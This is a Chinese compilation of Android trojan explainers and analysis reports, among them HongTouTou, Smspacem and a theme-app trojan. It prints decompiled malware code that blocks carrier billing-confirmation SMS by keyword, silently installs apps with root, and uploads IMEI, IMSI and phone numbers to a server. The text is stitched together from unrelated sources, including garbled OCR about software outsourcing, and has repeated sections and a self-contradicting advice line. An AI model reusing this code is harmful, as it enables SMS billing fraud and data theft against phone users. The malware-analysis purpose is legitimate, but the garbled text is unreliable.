android手机木马的提取与分析
手机木马原理
手机木马原理手机木马是一种恶意软件,通过潜藏在手机应用中感染设备并执行恶意操作。
其工作原理可分为以下几个步骤:1. 传播方式:手机木马可能通过多种方式传播,如通过恶意链接、应用下载或安装来自未知来源的应用等。
一旦用户点击或下载了木马应用,恶意软件便会开始植入和运行。
2. 植入手机系统:木马会试图植入到手机系统中,并获取系统级别的权限。
它会利用一些漏洞或系统安全性问题来获取这些权限,并绕过手机的防护机制。
3. 数据窃取:一旦木马植入成功并获取了系统权限,它就可以开始窃取用户的个人信息和敏感数据。
这些数据包括登录凭证、银行账户信息、个人通讯录等。
木马会将这些数据上传到远程控制服务器,供黑客使用或转售。
4. 远程控制:手机木马还可以被黑客远程操控。
黑客可以发送指令给木马,控制它执行各种操作,如发送短信、拍照、录音、窃取短信和通话记录等。
他们还可以利用木马发起网络攻击,感染其他设备或进行网络钓鱼。
5. 隐蔽性:为了不被用户察觉,手机木马通常会隐藏自己的图标和运行进程。
这使得用户很难察觉到手机已被感染,从而延长了恶意软件的潜伏时间。
为了保护手机免受木马感染,用户应采取以下措施:1. 下载应用时只从官方应用商店或可信的第三方应用市场下载,并注意应用的评论和评分,避免下载恶意或低评分的应用。
2. 及时更新手机操作系统和应用程序,以修复已知的漏洞和安全问题。
3. 安装可信的安全软件,及时扫描手机并清除潜在的恶意软件。
4. 禁用来自未知来源的应用安装选项,以防止恶意应用被安装。
5. 不点击来自陌生人或不可信来源的链接,尤其是不点击包含任何可疑内容的链接。
6. 注意手机的网络流量和电池消耗情况,以及不明原因的应用崩溃或手机反应迟钝等异常行为,可能是手机受到木马感染的迹象。
通过采取这些措施,用户可以增加手机木马感染的风险,保护个人信息的安全。
Android木马分析与编写
Android 木马分析与编写作者 mangel一、 Android 木马介绍Android 系统比iPhone 系统更开放,允许安装第三方应用程序,甚至是那些没有获得谷歌应用商店Android Market 批准的应用程序,但这种开放性似乎也增加了安全风险。
Android Marke 本身也发现了恶意软件感染的应用程序,不过用户可以像在个人电脑上所做的那样,通过安装杀毒软件来加以防范。
二、 概述该程序安装完是一款桌面主题,并可设置壁纸等。
运行后获取ROOT 权限,私自下载安装程序;并发送扣费短信,订制SP 服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
三、 样本特征1. 敏感权限 <uses-permission android:name="android.permission.DELETE_PACKAGES"黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处></uses-permission> <uses-permission android:name="android.permission.INSTALL_PACKAGES" ></uses-permission> <uses-permission android:name="android.permission.READ_CONTACTS" ></uses-permission> android.setting.START_SEND_SMS android.setting.SMS_SENTandroid.provider.Telephony.SMS_RECEIVED2. 入口点和恶意模块public class MyReceiver extends BroadcastReceiver{}(1).发送拦截短信:String str39 = "android.setting.SMS_SENT"; try{String str41 = arrayOfSmsMessage[i13].getOriginatingAddress(); SmsManager localSmsManager4 = localSmsManager1; ArrayList localArrayList7 = localArrayList2;localSmsManager4.sendMultipartTextMessage(str41, null, localArrayList5, localArrayList7, null); }if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) if ((arrayOfSmsMessage[i13].getOriginatingAddress().contains("10658166")) || (arrayOfSmsMessage[i13].getMessageBody().contains("83589523")) || (arrayOfSmsMessage[i13].getMessageBody().contains("客服")) || (arrayOfSmsMessage[i13].getMessageBody().contains("资费")) || (arrayOfSmsMessage[i13].getMessageBody().contains("1.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("2.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/条")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/次"))) abortBroadcast();(2). 获取ROOT 权限,安装卸载程序:private void installApk(String paramString1, String paramString2)try{Runtime localRuntime = Runtime.getRuntime();StringBuilder localStringBuilder = new StringBuilder("sudo pm install -r ");黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处File localFile2 = this.mContext.getFilesDir(); String str = localFile2 + "/" + paramString2; Process localProcess = localRuntime.exec(str); }private void installAPK() private void uninstallPlugin() { try {int i = Log.d("agui", "uninstall");Process localProcess = Runtime.getRuntime().exec("pm uninstall -r com.newline.root"); Intent localIntent1 = new Intent("android.intent.action.RUN"); Context localContext = this.mContext;Intent localIntent2 = localIntent1.setClass(localContext, MyService.class);ComponentName localComponentName = this.mContext.startService(localIntent1); return;}(3).窃取上传隐私资料:String str8 = Long.toString(System.currentTimeMillis()); Object localObject1 = localHashtable.put("id", str8); Object localObject2 = localHashtable.put("imsi", str4); Object localObject3 = localHashtable.put("imei", str5); Object localObject4 = localHashtable.put("iccid", str6); Object localObject5 = localHashtable.put("mobile", str7);String str9 = TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss"); Object localObject6 = localHashtable.put("ctime", str9); Object localObject7 = localHashtable.put("osver", "1");Object localObject8 = localHashtable.put("cver", "010101"); Object localObject9 = localHashtable.put("uid", str1); Object localObject10 = localHashtable.put("bid", str2); Object localObject11 = localHashtable.put("pid", str3);Object localObject12 = localHashtable.put("softid", paramString2);MessageService.4 local4 = new MessageService.4(this, paramIResponseListener); NetTask localNetTask = new NetTask(localHashtable, "utf-8", 0, local4); String[] arrayOfString = new String[1]; arrayOfString[0] = paramString1;AsyncTask localAsyncTask = localNetTask.execute(arrayOfString);public class NetTask extends AsyncTask<String, Integer, String> protected String doInBackground(String[] paramArrayOfString) URL localURL1 = new java/net/URL;String str5 = localStringBuffer1.toString();黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处URL localURL2 = localURL1; String str6 = str5;localURL2.<init>(str6);localHttpURLConnection = (HttpURLConnection)localURL1.openConnection(); localHttpURLConnection.setRequestMethod("GET"); localHttpURLConnection.setConnectTimeout(5000); localHttpURLConnection.setReadTimeout(5000);3. 敏感字符串("sudo pm install -r "); installAPK();contains("10658166") contains("83589523")contains("客服")contains("资费")四、 行为分析运行后获取ROOT 权限,私自下载安装程序;并发送扣费短信,订制SP 服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
Android木马HongTouTou分析报告
Android木马HongTouTou分析报告\Android木马HongTouTou分析报告安天实验室Android木马HongTouTou分析报告安天实验室一、基本信息病毒名称:Trojan/Android.Adrd.a[Clicker]病毒别名: HongTouTou、ADRD病毒类型:木马样本MD5:A84997B0D220E6A63E2943DA64FFA38C样本CRC32:A42850DE样本长度:1,316,981 字节原始文件名:Newfpwap_com_liveprintslivewallpaper.apk出现时间:2011.01.27感染系统:Android 2.0及以上二、概述ADRD木马(又名HongTouTou木马)被植入十余款合法软件中(图1),通过多家论坛、下载站点分发下载实现大范围传播。
其主要行为包括:开启多项系统服务;每6小时向控制服务器发送被感染手机的IMEI、IMSI、版本等信息;接收控制服务器传回的指令;从数据服务器取回30个URL;依次访问这些URL,得到30个搜索引擎结果链接;在后台逐一访问这些链接;下载一个.apk安装文件到SD卡指定目录。
感染该木马的手机将产生大量网络数据流量,从而被收取流量费用。
攻击者通过增加搜索链接的访问量而获益。
用户可以下载安天提供的Android恶意代码专查工具AScanner检测手机是否感染这一木马,并卸载相应软件将其清除。
图1 正常软件与被植入木马的软件三、样本特征截止本分析报告发布,安天已经检测到ADRD木马(又名HongTouTou木马)被植入到下列Android 软件:●动态脚印动态壁纸Live Prints Live Wallpaper●TurboFly 3D●Robo 3●iReader●桌面时钟天气Fancy Widget Pro●炫彩方块动态壁纸 Light Grid●超级酷指南针●指纹解锁●夕阳轮廓动态壁纸上述被植入木马的软件最早出现于2010年12月21日。
木马分析报告
木马分析报告1. 引言木马(Trojan),又称为“特洛伊木马”,是指通过伪装成正常合法程序或文件进入目标系统,并在未被用户察觉的情况下,对系统进行非法操作的恶意软件。
木马程序的存在给系统安全带来了重大威胁,因此,对木马进行深入分析和研究十分必要。
本文将对一款木马进行分析,并对其传播方式、特征和危害进行探讨。
2. 木马的传播方式木马程序主要通过以下几种方式进行传播: 1. 邮件附件:木马程序常常伪装成诱人的附件,通过邮件发送给用户,一旦用户点击或下载附件,木马程序就会悄悄安装和运行。
2. 网络下载:用户在未经过恶意网站的仔细筛选的情况下,下载了含有木马的软件或文件,木马程序就会被安装到用户的系统中。
3. 可移动存储介质:如U盘、移动硬盘等存储介质中含有木马程序,只要用户将这些介质连接到自己的电脑上,木马程序就会被植入系统。
4. 动态链接库:木马程序可能会以DLL(Dynamic-Link Library)的形式出现,通过注入到正常进程中,实现对系统的控制。
3. 木马的特征为了能够更好地进行木马防护,我们需要了解木马的一些特征: 1. 欺骗性:木马程序通常伪装成合法可信的程序或文件,例如常见的.exe、.doc、.pdf等,以迷惑用户进行安装或下载。
2. 启动项修改:木马程序常常会修改系统的启动项,以保证自己能够在系统启动时自动运行,从而实现长期隐藏控制。
3. 远程控制:木马程序通常与远程服务器建立连接,以便黑客能够远程控制被感染的系统,进行各种操控、监控和窃取敏感信息等操作。
4. 系统资源占用增加:木马程序运行时会消耗大量系统资源,例如CPU和内存,从而降低系统的整体性能。
5. 网络流量增加:木马程序会通过网络上传、下载数据,导致网络流量明显增加,对网速造成影响。
4. 木马的危害与预防木马程序给系统带来的危害非常严重,包括但不限于以下几个方面: 1. 数据窃取:木马程序可以利用系统权限,窃取用户的个人隐私数据,例如登录名、密码、银行账号等。
基于Android手机录音木马的原理分析与实现
件产 品质量保证的核心部分 。 软件配置管理伴 随着软件产 品的 在迅速 发展 ,并逐渐 形成产业规模,中小规模 的软件企业也纷 整个 生命周期 , 不仅能够准确 的掌握项 目各个里程碑 阶段的实 纷 建立软件 外包联盟 。本课题主 要从软件外 包行业 的发展现 际情况 ,还能够控制软件产 品项 目的开发进度 , 使得软件产 品 状 、 目前软件外包保证 方面存在 的问题 以及影响因素三个方面 最 的开发能够及时的适应新 的需求 的变动 , 从而确保软件产 品有 进行探 讨, 终在 软件 外包 质量 保证 实施 方面给出 了具体的工 条不 紊的按照进度开展 , 在提高工作效率 的同时, 也使得 软件 作 内容 以及 关键 技术 。因此 ,只要使用合理 的技术手段 ,通过 产 品成 功开发的概率大大提升 。 最后一个技术便是检查表 以及 与 需求 以及 标准 的对 比 , 发现软件产 品存 在的 问题 并及时的进 模版 , 检查表 以及模版是形成软件产 品保证报 告的基础 , 过 行解 决,便 可以最大限度 地保证外包类软件产 品的质量 。 通 检查表 以及模 版可 以简化文档 的工作 , 但是 , 同的软件产 品 不
效率 , 短开 发周 期,提高测试 以及性 能维护的效率。软件配 软件发包方 主要 来 自欧美和 日本 。 缩 随着科学技术 的进步 , 国 我 中 置管理,作为外包软件项 目研发 的重要过程 , 软件配置 管理在 软件外 包行 业也逐渐 变得愈加的具备竞争优势 , 国各地如北
确 保外 包软件产品质量的过程 中起到 了至关重要 的作用 , 是软 京 、上海 、大连 、西安 、杭州 、合肥 等城 市的软件外包行业正
2 1. 1 突发异常状况 的准备工作 。在例外事件发生的情况 下, 当有 件导刊,0 应
Android木马Smspacem分析报告
Android木马Smspacem分析报告Android木马Smspacem分析报告安天实验室Android木马Smspacem分析报告安天实验室一、基本信息病毒名称:Trojan/Android.Smspacem病毒类型:木马样本MD5:60CE9B29A6B9C7EE22604ED5E08E8D8A样本长度: 1855,053 字节发现时间:2011.05.22感染系统:Android 2.1及以上二、概述Smspacem木马主要行为是在开机时自启动,被该恶意软件感染的设备会自动获取手机用户通讯录中的信息(联系人名称、电话号码、Email等),自动向其联系人电话发送短信,其内容为事先编辑好的,如“现在无法通话,世界末日即将来临”等;该软件还试图访问指定的主机服务,并将从被感染设备的通讯录中获得的邮箱地址发送到远程服务器上;最后还会将被感染设备的壁纸修改为事先设定好的图像。
当被该恶意软件感染的设备接收短信时,短信将被拦截,并且该恶意软件将删除短信数据库中的短信,并且向该短信的发送地址发送一条事先编辑好的信息,如“现在无法通话,世界末日即将来临”等。
这一类的木马主要由最近关于世界末日将于2011年5月21日来临的新闻所引起。
抵御木马的关键是用户要对自己的设备进行安全设置,并在安装软件后查看其权限中是否存在敏感的权限等。
图 1 Holy软件界面及特殊权限三、样本特征3.1敏感权限●允许应用程序访问设备的手机功能:有此权限的应用程序可以确定此手机的号码和序列号、是否正在通话、以及对方的号码等。
●允许应用程序发送短信:恶意应用程序可能会不经您的确认就发送信息,给您产生费用。
●允许应用程序写入手机或 SIM 卡中存储的短信:恶意应用程序可借此删除您的信息。
●允许应用程序读取您的手机或 SIM 卡中存储的短信:恶意应用程序可借此读取您的机密信息。
●允许应用程序接收和处理短信:恶意应用程序可借此监视您的信息,或者将信息删除而不向您显示。
手机木马病毒介绍
目前智能手机系统上的木马病毒程序已经泛滥,特别是An droid系统开源且水货、刷机行为较多,成为木马病毒的主要攻击方向。
Andro id系统的木马病毒系统可分为如下主要特征:1、获取硬件信息,如IMEI、IMSI等2、访问特定网站,增加流量或通话费用3、窃取用户通话及短信信息4、窃取用户键盘输入的敏感信息在以上特点中,第三和第四点对手机银行的危险性最大,木马能够窃取客户输入的用户名、密码以及手机交易码信息,并发送远程服务器。
1、窃取用户通话及短信信息木马介绍2011年11月,信息安全厂商卡巴斯基发表分析文章,介绍智能手机ZitM o (Zeu S-in-the-M obile)木马是如何盗取用户重要数据的。
手机交易码曾被认为是最可靠的网银安全保护措施之一。
然而,随着专门针对智能手机的Zeu S木马出现,特别是Z euS-i n-the-Mobi le或Zi tMo–m TANs的出现,手机交易码已不能确保用户的重要数据不会落入网络罪犯的手中。
Zit Mo 于2010年9月首次被检测到,专门用来盗取由银行发送的短信息中的m TAN代码,也是迄今为止最受关注的手机安全事件之一。
网络安全专家分析称,“首先,该病毒具有跨平台传播的能力,无论是S ymbia n、Win dowsMobil e、Bla ckber ry和An droid系统,都被检测到了这种木马,其目的主要是将手机交易码短信息转发给网络罪犯(或者是一台服务器),后者进而可以利用这些被侵入的银行账户进行非法交易。
但是,ZitMo最大的特点是它与台式计算机木马ZeuS背后的关系。
如果没有后者的话,Z itMo仅仅能起到一个转发短信息的间谍程序作用。
手机木马实验报告
手机木马实验报告手机木马实验报告1. 引言手机木马是一种恶意软件,它能够在用户不知情的情况下获取手机的敏感信息、控制手机的功能以及传播自身。
为了深入了解手机木马的工作原理和危害程度,我们进行了一系列的实验。
2. 实验目的本次实验的目的是通过模拟手机木马的攻击行为,评估其对手机和用户的威胁程度,以及提供相应的防护建议。
3. 实验方法我们使用了一台安装有最新操作系统和杀毒软件的Android手机作为实验对象。
通过下载一款模拟手机木马的应用程序,并在实验过程中监测其行为,我们能够了解手机木马的攻击方式、传播途径以及对手机的影响。
4. 实验结果在实验过程中,我们观察到以下几个现象:4.1 敏感信息获取手机木马能够在用户不知情的情况下获取手机中的敏感信息,如联系人、短信、通话记录等。
我们发现,模拟的手机木马成功地获取了手机中的敏感信息,并将其上传到了远程服务器上。
4.2 功能控制手机木马可以远程控制手机的各项功能,包括拍照、录音、发送短信等。
我们测试了模拟木马的远程控制功能,发现它能够远程激活手机的摄像头,并将拍摄到的照片发送到远程服务器。
4.3 自我传播手机木马可以通过各种方式自我传播,如通过短信、应用商店等。
我们模拟了手机木马的传播行为,并观察到它成功地向其他手机发送了包含木马应用的短信,并诱导用户下载安装。
5. 结果分析通过以上实验结果,我们可以得出以下几点结论:5.1 手机木马对用户隐私的侵犯程度非常高,能够获取用户的敏感信息并传输给攻击者。
5.2 手机木马的功能控制能力使得攻击者可以远程操控手机,可能导致更严重的后果,如偷拍、窃听等。
5.3 手机木马的自我传播能力使得其传播速度非常快,可能导致大规模的感染。
6. 防护建议为了保护手机和用户的安全,我们提出以下防护建议:6.1 安装可信任的杀毒软件,并及时更新病毒库。
6.2 不要随意下载来历不明的应用程序,尤其是通过非官方渠道下载。
6.3 注意手机的权限设置,仅授权给必要的应用。
Android平台木马的检验鉴定
E x a mi n a i t o n o f T r o j a n o n A n d r o i d P l a t f o r m
Q I N Y u — h a l , Y ANG S o n g , HO U S h i — h e n g
( Na t i o n a l P o l i c e U n i v e r s i t y o fC h i n a , S h e n y a n g 1 1 0 8 5 4 , C h i n a )
i n t r o d u c e d t h e s t uc r t u r e o f A n d r o i d p l a t f o m r a s w e l l a s t h e r e l a t e d p r i n c i p l e s o f T r o j a n v i us r . A s a s o l u t i o n , t h e s t u d y u s e d
t h e A D B c o mma n d t o e x t r a c t T r o j a n i f l e s o u t o f t h e q u e s t i o n e d d e v i c e s ,a n d a p p l i e d t h e r e v e r s e a n a l y s i s t e c h n o l o g y t o
Ch i n e s e J o u r n a l o f F o r e n s i c S c i e n c e s , 2 0 1 7 . N o . 3 T o t a l N o . 9 2
鉴
定Leabharlann 科学 Re s e ar c hPa pe r
基于Android平台的手机木马的设计与实现
S h a n g h i a 2 0 0 1 2 0 , C h i n a )
A b s t r a c t : As o n e o f t h e t h r e e ma j o r s ma r t - p h o n e s y s t e m, A n d r o i d h a s a l r e a d y b e c o me t h e a t t a c k t a r g e t o f he t h a c k e r s b e c a u s e o f i t s o p e n s o u r c e . Mo b i l e T r o j a n s i s a n e l u s i v e nd a r f a u d u l e n c e a t t a c k me ho t d nd a i s b e c o mi n g wi d e s p ma d o n t h i s p l a f t o r m. Al ho t u g h a l o t o f a t t e n — t i o n i s p a i d o n i t , b u t d o n o t h a v e g o o d s o l u i t o n t O i t . I n hi t s p a p e r , d e s i g n a s i mp l e T o r j n a wh i c h r e a l i z e s c o m ma nd r e c e i v e r , i n f o r ma t i o n
Un i v e r s i t y, S h a n g h i a 2 0 0 2 4 0, C h i n a ; 2 . Ke y La b o f I n f o m a r t i o n Ne t wo r k S e c u r i t y o f t h e Th i r d Re s e a r c h I n s i t t u t e o f Mi n i s t r y o f P u b l i c S e c u r i t y,
手机木马病毒介绍
目前智能手机系统上的木马病毒程序已经泛滥,特别是Android系统开源且水货、刷机行为较多,成为木马病毒的主要攻击方向。
Android系统的木马病毒系统可分为如下主要特征:1、获取硬件信息,如IMEI、IMSI等2、访问特定网站,增加流量或通话费用3、窃取用户通话及短信信息4、窃取用户键盘输入的敏感信息在以上特点中,第三和第四点对手机银行的危险性最大,木马能够窃取客户输入的用户名、密码以及手机交易码信息,并发送远程服务器。
1、窃取用户通话及短信信息木马介绍2011年11月,信息安全厂商卡巴斯基发表分析文章,介绍智能手机ZitMo (ZeuS-in-the-Mobile)木马是如何盗取用户重要数据的。
手机交易码曾被认为是最可靠的网银安全保护措施之一。
然而,随着专门针对智能手机的ZeuS木马出现,特别是ZeuS-in-the-Mobile或ZitMo–mTANs的出现,手机交易码已不能确保用户的重要数据不会落入网络罪犯的手中。
ZitMo 于2010年9月首次被检测到,专门用来盗取由银行发送的短信息中的mTAN 代码,也是迄今为止最受关注的手机安全事件之一。
网络安全专家分析称,“首先,该病毒具有跨平台传播的能力,无论是Symbian、Windows Mobile、Blackberry和Android系统,都被检测到了这种木马,其目的主要是将手机交易码短信息转发给网络罪犯(或者是一台服务器),后者进而可以利用这些被侵入的银行账户进行非法交易。
但是,ZitMo最大的特点是它与台式计算机木马ZeuS背后的关系。
如果没有后者的话,ZitMo仅仅能起到一个转发短信息的间谍程序作用。
而通过它们之间的…团队合作‟,网络罪犯才能成功的避开保护网银安全所使用的mTAN安全设置。
”这种攻击方式的精心安排通常有以下几个步骤:网络罪犯首先使用台式计算机版的ZeuS来盗取必要的数据,以便进入网银账户并收集用户的手机号码。
受害者的手机收到一条要求升级安全证书或其它重要软件的短信。
Android恶意代码——木马APK分析
( 1 )不需要真 正执行恶 意代码 ,可 以避 免对恶意攻击者发现 ; ( 2 )误 报 率 低 ( 3 )不受具 体进程执行 流程 的制约,可 以对代码 进行详尽的细粒度分析 。 我 们通 过对 一线 公安 机关 办理 的相 关恶 意窃取隐私案件 中的 a p k样 本进行反编译 ,对 木 马部分源码 进行静态分析后可 以掌握犯罪嫌 疑人的手机号码及电子邮箱等个人信息,并能 掌握木 马取证的恶意操作:如读取短信、监控 短信收发、读取联系人、后 台发送 邮件等操作 。
3 基 于 安 卓 平 台 恶 意 代码 的 分 析
3 . 1 分 析 工 具 An d r o i d Ki l l e r 是 一 款 可 视 化 的安 卓 应 用 逆 向 工 具 ,集 Ap k反 编 译 、ip k打 包 、Ap k签 名 , 编 码 互 转 ,ADB通 信 ( 应用安装 一 卸 载 运 行 一
设备文件管理 )等特色功能于一身 。它包含 了 a d b 、a p k t o o l 、d e x 2 j a r 、i d - g u i 等反编译工具 。 其中 a p k t o o l 能将 a n d r o i d中 的 . a p k文 件转 换 成. d e x文件 ;d e x 2 j a r 能将 第一 步 的 . d e x文件 反 编译 成 . j a r 文件 ;j d - g u i 能将 . j a r 文 件 反编 译成 . j a v a 文件进行分析 。 3 . 2安卓木马 固定
漶 安全 ・ I n f o r ma t i o n S e c u r i t y
A n d r o i d恶意代码——木 马 A P K分析
文/ 卢委红 陶 一 鸣
优 点包 括 :
Android手机木马提取与分析
Android手机木马提取与分析赵鑫;郭红怡;杨晶【期刊名称】《昆明学院学报》【年(卷),期】2016(038)006【摘要】Along with the sharp increasing of mobile Internetusers,telecommunications fraud industry chain spreads quickly.Relying on pseudo base station equipment,the fraudsters send phishing site,implant Trojans to Android,complete remote transfer accounts without knowing of the users.This kind of telecommunications fraud methods enriches the attacking methods,including filching privacy, intercepting message,remote control,and fishing,etc.Internet cases must be investigated through network thinking and the investiga-tors must understand and master the principles of phishing,Android Trojan decompilation,application installation package extraction and other professional knowledge.Based on the analysis above,we studied the cases of phishing scams in which Android Trojan apk ex-traction method and the apk decompilation were analyzed,and through the example to know the methods of Android Trojan detection and analysis.%随着手机网民的急剧上升,电信诈骗产业链迅速蔓延,诈骗者依靠伪基站设备发送钓鱼网址,给用户手机植入Android木马,在用户不知情的情况下完成远程转账。
浅析新型Android手机木马病毒功能及实现盗刷银行卡过程
浅析新型Android手机木马病毒功能及实现盗刷银行卡过程刘鑫;李维
【期刊名称】《中国安全防范认证》
【年(卷),期】2017(000)002
【摘要】目前Android手机木马病毒日益猖獗,经常有犯罪团伙利用向目标植入手机木马病毒,获取公民个人信息,进而对目标银行卡进行盗刷.本文利用dex2jar、apktool等工具对木马病毒文件源代码进行解析,通过源代码分析,分析木马主要功能及犯罪团伙如何利用木马盗取目标银行卡资金.
【总页数】3页(P55-57)
【作者】刘鑫;李维
【作者单位】天津市公安局网络安全保卫总队案件支队;天津市公安局网络安全保卫总队案件支队
【正文语种】中文
【相关文献】
1.路试状态汽油机缸内热功转换过程性能及影响因素的检测与分析 [J], 唐琦军;刘敬平;付建勤;易鹏;朱国辉
2.浅析银行卡盗刷纠纷中银行法律责任 [J], 王小强
3.普天大唐:新型恒流调功控制器实现灵活调功 [J], 无
4.浅析Android手机的应用双开实现原理及风险 [J], 王建阔
5.浅析Android手机的应用双开实现原理及风险 [J], 王建阔
因版权原因,仅展示原文概要,查看原文内容请购买。
手机病毒木马简介和分析方法培训课件
< uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
3.在AndroidManifest.xml中把接受消息意图 的类和消息意图关联
手机病毒木马简介和分析方法
20
手机病毒木马发展趋势
▪ 反杀毒化 当手机恶意程序获得较高权限时,类似
PC机 就可能关闭或者欺骗各种杀毒软件, 这样杀毒软件就无法发现手机病毒木马程 序。
手机病毒木马简介和分析方法
21
智能手机系统
▪ Symbian
Symbian操作系统即我们常说的“塞班系 统”。它由诺基亚、索尼爱立信、摩托罗 拉、西门子等几家大型移动通讯设备商共 同出资组建的一个合资公司研发的手机操 作系统。
▪ 现在,越来越多的手机病毒木马传播开来, 而且传播方式和功能也越来越强大。
手机病毒木马简介和分析方法
6
手机病毒木马自身的特点
▪ 手机病毒紧紧结合手机系统提供的功能, 利用手机系统内部的运行机制来完成自己 的破坏,并进行传播与感染。
▪ 多种传播方式:存储卡、网络下载、wifi、 蓝牙、红外及彩信等。
手机病毒木马简介和分析方法
29
手机木马的实现原理
▪ 自启动 像计算机病毒木马一样,手机木马也是
随着手机启动而自动运行的。特别是在智 能手机系统上,自启动技术是必备的一种 功能,但是也为病毒木马提供了生存空间。
手机病毒木马简介和分析方法
30
Symbian自启动方式
▪ 对于Symbian系统而言,系统提供了一定的
超强杀伤:手机现最“流氓”木马病毒,恢复出厂化也无法清除
超强杀伤:手机现最“流氓”木马病毒,恢复出厂化也无法清除据最新消息,现在手机正流行着一种名为“悍马”的木马病毒,它可以悄悄的自动安卓色情应用的恶意软件,每天感染的设备数量超过了百万部。
正在成为全球最大的移动手机木马病毒。
猎豹早就开始追踪“悍马”消息表明,早在2014年,猎豹移动的研究人员就开始追踪“悍马”了,其造成的危害远远大于其他手机端木马病毒,其顽固程度强的令人发指,即使你采取“恢复出厂化”的措施,依然无法有效清楚“悍马”病毒。
“悍马”病毒主要危害悍马伪装成一款能够让用户访问YOU Tube等谷歌旗下的项目,而“悍马”真正的目的是直接后台自动ROOT手机并且获取最高权限。
然后,噩梦开始了,“悍马”在取得了最高权限后,开始在后台源源不断的下载且安装各种垃圾游戏和软件,而且还在手机端频繁的弹出广告。
通过猎豹移动的测试,只需要几个小时的时间,“悍马”就能够让手机访问网络连接数万次。
消耗网络流量2GB,下载apk超过200个。
“悍马”无法删除据猎豹移动测试,就算“悍马”被卸载掉,“悍马”也会自动的恢复到你的手机中,这种情况就算恢复出厂化后也是一样,而要怎么解决这一问题呢?目前最有效的方法当然就是不要去下载,据了解,悍马病毒只出现在一些陌生的下载源头,这里建议大家不要在陌生的地址下载APP,最好是在官方的应用商店下载。
不过,猎豹移动已对旗下猎豹安全大师、猎豹清理大师两款安全产品进行升级,并提供专杀工具供全球用户下载(,帮助用户清除悍马(hummer)病毒,中毒用户亦可选择通过手机刷机来彻底清除。
安卓手机更容易中招经过国外安全局研究报告称:约有超过87%的Android设备是没有安全保障的,他们会在下载第三方应用是植入几十种,甚至上百种的病毒、木马,正因为Android手机在全球占有率要比iOS高出许多,也就意味着Android用户未来将会暴露在不安全的环境下,用户更加注重安全性问题。
IOS优于封闭而苹果的IOS系统也不是没有漏洞,只是由于封闭式的系统特性使得漏洞能够及时的被发现和处理,而且iOS上的应用程序和游戏在移动设备中是数一数二的,无论是画面还是音效都是当时手机领域的顶级之作。
Android Gamex木马分析报告
Android Gamex木马分析报告图/文非虫5月刚开始就弄到了这个Gamex木马样本,该样本破坏性不大,不过对于安全分析人员来说,这可是很好的研究素材,今天我就将这个样本的完整分析过程拿来与大家分享。
工具ApkTool、dex2jar、DJ Java Decompiler分析必备python2.6编写解密脚本分析这个样本通过捆绑软件SD-Booster来达到感染的目的,在安装运行被感染的SD-Booster时,木马就会自动安装进Android系统,为了尽快找到感染部分,下载未感染的SD-Booster进行反编译对比,结果如图1所示:图 1程序被植入了“com.android.md5”与“com.gamex.inset”两个包,首先找到植入程序的加载处,在SDBoost 类的onCreate()方法中插入了如下代码:public void onCreate(Bundle paramBundle) {super.onCreate(paramBundle);A.b(this);…}A是“com.gamex.inset”包中的类,A.b()方法代码如下:public static void b(Context paramContext){context = paramContext;Intent localIntent = new Intent(paramContext, Settings.class);ComponentName localComponentName = paramContext.startService(localIntent);}直接启动的是Settings.class服务,这个服务很简单,启动代码是这样的:public void onStart(Intent paramIntent, int paramInt){super.onStart(paramIntent, paramInt);new Settings.1(this).start();}class Settings$1 extends Thread{public void run(){if ((!A.a) && (A.c()) && (A.d(A.context))){A.a = 1;Settings localSettings = this.this$0;new C(localSettings).start();}while (true){return;this.this$0.stopSelf();}}}A.a初始化为0,用来判断木马是否已经运行,A.c()只有一行代码判断SD卡是否已经准备好,为后面的病毒下载做准备,A.d()判断木马程序“com.android.setting”是否已经安装,如果没有安装且满足上面的条件就启动C线程来安装木马,C类的run()方法在Dex2jar中显示不了,在DJ Java Decompiler中可以看到完整的反编译的代码,线程通过context.getAssets().open("logos.png")读取木马文件,然后通过解密运算得到最终的apk安装文件,解密代码我用python实现如下:# -*- coding:utf-8 -*-import sysdef main(filename):infile = file(filename,"rb")outfile = file(filename[:-4]+".apk","wb")while1:c = infile.read(1)if not c:breakc = chr(ord(c) ^ 18)outfile.write(c)outfile.close()infile.close()if __name__ == '__main__':main(sys.argv[1])解密只是将整个文件与0x12异或而以,运行“python decrypt_apk.py logos.png”就会生成logos.apk木马文件。
Android木马样本分析
一、基本信息一款内嵌木马的桌面主题。
病毒名称:TDHOME病毒类型:木马样本MD5:3059E109DC5A29AC9E5B7DE630EA7019样本长度:1820219字节感染系统:Android二、概述该程序安装完是一款桌面主题,并可设置壁纸等。
运行后获取ROOT权限,私自下载安装程序;并发送扣费短信,订制SP服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
三、样本特征1. 敏感权限<uses-permissionandroid:name="android.permission.DELETE_PACKAGES"></uses-permission><uses-permissionandroid:name="android.permission.INSTALL_PACKAGES"></uses-permission><uses-permissionandroid:name="android.permission.READ_CONTACTS"></uses-permission>android.setting.START_SEND_SMSandroid.setting.SMS_SENTandroid.provider.Telephony.SMS_RECEIVED2. 入口点和恶意模块public class MyReceiver extends BroadcastReceiver{}(1).发送拦截短信:String str39 = "android.setting.SMS_SENT";try{String str41 = arrayOfSmsMessage[i13].getOriginatingAddress();SmsManager localSmsManager4 = localSmsManager1;ArrayList localArrayList7 = localArrayList2;localSmsManager4.sendMultipartTextMessage(str41, null, localArrayList5, localArrayList7, null);}if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED"))if ((arrayOfSmsMessage[i13].getOriginatingAddress().contains("10658166")) || (arrayOfSmsMessage[i13].getMessageBody().contains("83589523")) || (arrayOfSmsMessage[i13].getMessageBody().contains("客服")) || (arrayOfSmsMessage[i13].getMessageBody().contains("资费")) || (arrayOfSmsMessage[i13].getMessageBody().contains("1.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("2.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/条")) || 